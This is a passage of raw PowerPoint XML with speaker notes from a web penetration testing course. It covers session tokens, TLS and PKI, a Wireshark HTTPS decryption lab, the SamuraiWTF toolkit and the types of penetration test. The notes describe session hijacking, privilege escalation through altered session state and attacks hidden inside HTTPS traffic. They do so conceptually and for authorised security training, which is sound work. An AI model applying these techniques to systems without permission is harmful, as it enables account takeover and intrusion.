                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Typically a session token is passed to and from the client which the server/application then uses to map to the session data stored on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Popular methods for tracking state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URI Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hidden Form Fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>As testers, we need to evaluate these tokens for problems or predictability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23997746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A cookie is just a snippet of data that is sent from the server to the client, stored on the client, and sent back to the server upon request.  These cookies can be stored in memory or written to disk, depending on the developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s purpose.  Often, this information is just a session identifier, but quite often this data is more informative.  For example, the application can store your user name, so that the next time you visit, it will recognize you.</a:t>
            </a:r>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71</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Another method of passing session tokens between the server and the client is by placing them in the URI.  Either the session token itself, or the actual session data, can be included in parameters and inserted into each of the links on the page, before the page is sent to the client.</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72</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As applications are built, forms are used to accept input from the user.  These forms can also include hidden form fields which contain the information that the application needs passed across the session.  Typically, we see significant information being stored in hidden form fields.  Of course, this is an example of the developer trusting that all of their users are gruntled.</a:t>
            </a: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73</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Session state is one of the primary attack targets for web applications. If an attacker can find an session state issue, many attack vectors are opened.  For example, we could hijack someone else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s session and perform functions as them, with their credentials.  Or, we could modify the session state to indicate administrator-level privilege within the application.</a:t>
            </a:r>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74</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This next section covers Transport Layer Security (TLS, formerly Secure Socket Layer (SSL)).  This is a mechanism for encrypting HTTP traffic.  While SSL/TLS provides protection from eavesdropping, it also allows attackers to interact with the web application without their content being captured by most network monitors.</a:t>
            </a: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75</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pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP has been an amazing success– particularly from the attacker's perspective.  Anyone who has run tcpdump or Wireshark can attest to the ease with which an attacker can inspect content sent across the network.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To address the issue, we rely on the Transport-Layer Security (TLS) framework. The predecessor to TLS is the Secure Sockets Layer (SSL). Informally, people often use "SSL" to refer to both SSL and TLS, so throughout this class we will use the terms interchangeably. SSL versions 2 and earlier are considered far less secure than SSL v3 and TLS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SSL/TLS operates beneath the OSI model's Application layer, and can be used to encapsulate any application-layer protocol. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows the same technology to be used to secure SMTP and IMAP (for example) as is used for HTTP.  LDAPS/SMTPS/IMAPS/HTTPS have been so successful that full VPN products such as OpenVPN  have been built on the power of SSL, allowing for much simpler setup than IPSEC alternatives.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SSL/TLS relies on Public Key Infrastructure (PKI) for encryption and trust.  </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76</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267268"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The web server owner generates a key and submits it to a certificate authority.  The CA performs some form of authentication and verification that the server is who it says it is.  This verification can be as simple as sending an e-mail to the domain or as complex as the process followed for the extended validation (EV) certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When the web browser requests an HTTPS page from the web server, it receives the server's public key.  Since this is signed by the CA and the CA is trusted, the browser trusts that this server is who it identifies itself as.</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77</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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is used to create an encrypted connection between two computer systems.  This protection  keeps the data hidden from anyone who may be "sniffing" the network traffic.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each system involved in the communication can decrypt the data.  This can include proxy servers that forward and receive traffic for the connection, as well as the end systems. On either end, an attacker can easily access the data using any number of debugging tools and techniques such as DLL-injection (so-injection on POSIX)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web application attacks which occur over HTTPS-encrypted sessions are hidden from standard network devices and intrusion detection systems, because they are encrypted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows attackers to launch exploits with low probability of detection. Many IDS vendors are including in their products the capability to decrypt HTTPS traffic, which requires them to have the private keys of the protected servers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other web entities architect their sites using HTTPS Accelerators which allow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to terminate on a network device prior to the data reaching the web server.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not only does this gain performance but also allows IDS to see traffic between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Accelerator and web server.</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78</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altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Scenario:  In this exercise, you will become acquainted with how data in an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>encrypted request / response connection appears, and how that data can be decrypted within Wireshark if the proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>certificate is available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="SimSun" charset="0"/>
              <a:cs typeface="SimSun" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Objectives: You will begin by monitoring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>-encrypted data transferred to a web browser from the HTTPS server running in the provided virtual machine.  You will then go through the steps to install an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>certificate in Wireshark that will allow you to decrypt and view data on the fly. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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79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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186371"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In recent years cloud computing has become a major move in technology.  Many organizations are either running web applications in the cloud or evaluating such a move.  While these applications expose the same types of risks and flaws as non-cloud based applications, just like traditional apps, testing is limited to functionality.  As a matter of fact, many organizations that have robust security testing procedures don't perform security testing on cloud based applications.  This is because of worries regarding liabilities or restrictions.  Many people even believe that cloud vendors won't allow testing of their infrastructure.  In most cases though, this is an incorrect belief.  Cloud vendors do allow application-level testing in many instances, ask your target.</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8</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In this next section, we will explore SamuraiWTF and its use within a penetration test and this class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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80</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The Samurai Web Testing Framework is an open source project released by Kevin Johnson of Secure Ideas and Justin Searle of UtiliSec.  It is a liveDVD environment that comes pre-installed to focus on web penetration testing.  It was released in 2008 and is actively being developed.  Kevin and Justin based it off of the Ubuntu Linux distribution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This DVD is useful to penetration testers as it includes the tools we use every day as well as target applications.  This allows the tester to use tools without worrying about installing them and to have an environment to test and practice within.  In this class we will use SamuraiWTF as both a client during exercises and during the capture the flag on day 6.</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81</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The SamuraiWTF liveDVD is a graphical desktop.  Many of the tools are available right from the Samurai menu, others are accessible from a terminal.  Most have been installed in /usr/bin/samurai.  SamuraiWTF also includes SVN update capabilities to grab newer versions of the tools directly from developer sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SamuraiWTF comes with all of the tools we have been discussing in class.  Things such as Grendel-Scan and w3af are pre-installed and configured.  SamuraiWTF also ships with various interception proxies, (Burp, Paros, WebScarab) and stand-alone test tools, (nmap, webshag, sqlmap).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the most powerful features is the pre-configured wiki.  SamuraiWTF ships with a MoinMoin wiki that has been set up specifically to be used for web pen test tracking.  The developers of SamuraiWTF are also working on add-ons for the wiki that will provide features, such as automated host lookup or IPs and site mapping, that will make the tracking even easier.</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82</a:t>
            </a:fld>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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195587"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On the class DVD is a VM that is configured to run the SamuraiWTF live environment.  This environment is used as the client within all of the exercises, unless noted within the exercise.  This is similar to how you would use SamuraiWTF within a real penetration test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For the class, you will need to extract this VM from the zip file on the DVD.  Please make sure that when you first launch the VM select the right choice on if it was moved or copied.  As is shown in the README, select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>I moved it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>.  This retains the network settings within the VM.  This is the same for the target VM also.</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83</a:t>
            </a:fld>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The next few sections are going to discuss what we mean by a penetration test.  We will also be discussing the pieces that make up a test and discuss how an internal team is handled differently than an external test team.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will start with the types of penetration tests that exist.</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84</a:t>
            </a:fld>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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27648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A black box test is not done very often but seems to be the one that everybody thinks of when penetration testing is mentioned.  While it is possible to perform a web application test with just the URL to begin, we wouldn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t recommend it! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In a black-box penetration test, the testers are given little or no information about the target environment in advance. Black box testing is seen more often during network tests that include any web applications found.</a:t>
            </a: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85</a:t>
            </a:fld>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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27750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White box testing is the most cooperative test.  It is usually done by an internal team but more often outside firms are being asked to perform this type of testing.  The testing team is usually part of the QA team and as such becomes part of the software development life-cycle within the company.  They usually have access to the source code and will review it and any bug reports to find vulnerabilities.  External team brought on for this type of test need to make sure that they quickly understand the development processes used and integrate themselves rapidly.</a:t>
            </a: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86</a:t>
            </a:fld>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The grey box test is the most common test done by external companies.  It requires the testing firm to do more work up front to gather the needed information.  Communication between the testing team and the application owners during the test is also critical.  Typically internal teams do not perform this type of test since they are part of the development process.</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87</a:t>
            </a:fld>
            <a:endParaRPr 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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27955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In the next few slides we are going to discuss the differences between manually testing an application and running automated tools.  Then we will talk about which is better. This is a very common question, both from penetration testers and others.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each of the methods has their strengths, but they also have their weaknesses.  As penetration testers, we need to understand these differences and work around or with them during our tests.</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88</a:t>
            </a:fld>
            <a:endParaRPr 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Manual attacks are one of the first ways that someone who wants to really understand an attack will use.  While we call it manual, simple scripts and tools can be used.  This method is relatively slow compared to automated testing, but can be as thorough as the tester chooses, because he or she controls the entire test.</a:t>
            </a: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89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What do we need to start testing our applications before the bad guys test them for us?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First, we need to understand how the web works.  Then we need an attack methodology and the tools to execute it.  Most importantly, we need permission to test web applications for vulnerabilities in a specific environment.  Make sure that you receive permission, in writing, from someone who has the authority to give it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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9</a:t>
            </a:fld>
            <a:endParaRPr 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Automated attacks use suites of tools that work together.  Some examples of these are WebInspect by HP and the Burp suite from portswigger.  These tools will rapidly scan a site and return the vulnerabilities it finds.  Keep in mind that rapidly can still take hours on larger sites, it just means faster than manually.  The problem is that the attacker has less control of what the attacks do and these tools are prone to false positives.</a:t>
            </a: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90</a:t>
            </a:fld>
            <a:endParaRPr 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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28262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So which is better?  I find that as I test applications that both of these methods are combined to give me the best results from both.  I can use an automated scanner to give me a baseline and starting point.  And while that is running I can manually be reviewing the site for problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As you approach each site, you will need to balance the tools and methods you use.  As we have discussed, use the scanners as a starting point and then follow-up by validating their findings and using the findings to expand your foothold within the application.</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91</a:t>
            </a:fld>
            <a:endParaRPr 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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28365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Next we are going to discuss the four pieces or sections of a web application pen-test.  They are preparation, testing, reporting and presentation.  All of them except presentation are mandatory if the penetration test can be considered successful.  It doesn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t matter how cool your hack was, or how stylish your victory dance, if the report doesn't enable the application owner to fix the issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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92</a:t>
            </a:fld>
            <a:endParaRPr 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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28467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Preparation never ends.  Think of any professional sports team.  They play one or two times a week in a real game, but they practice every day.  As penetration testers, you need to do the same thing.  We are also going to discuss some of the things that need to happen at a management level before the team can swing into action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Every day you should be practicing your skills and techniques.  I will often set up a test system and install a few different open source applications to test my way through them.  One this enables me to practice with real systems that I will probably encounter during a regular engagement.  Two, I can report any problems I find back to the project so they can be fixed.  You should also practice as a team since everyone has a different style and by working together, you can learn how to build upon each other’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> strengths.</a:t>
            </a:r>
          </a:p>
          <a:p>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93</a:t>
            </a:fld>
            <a:endParaRPr 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This next subsection is going to discuss the management of the test.  This is done in the preparation step since without an understanding of this, the test can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t even start.  We will discuss making sure that everyone understands the test, the need for permission and the various pieces of information needed before beginning the test.</a:t>
            </a:r>
          </a:p>
          <a:p>
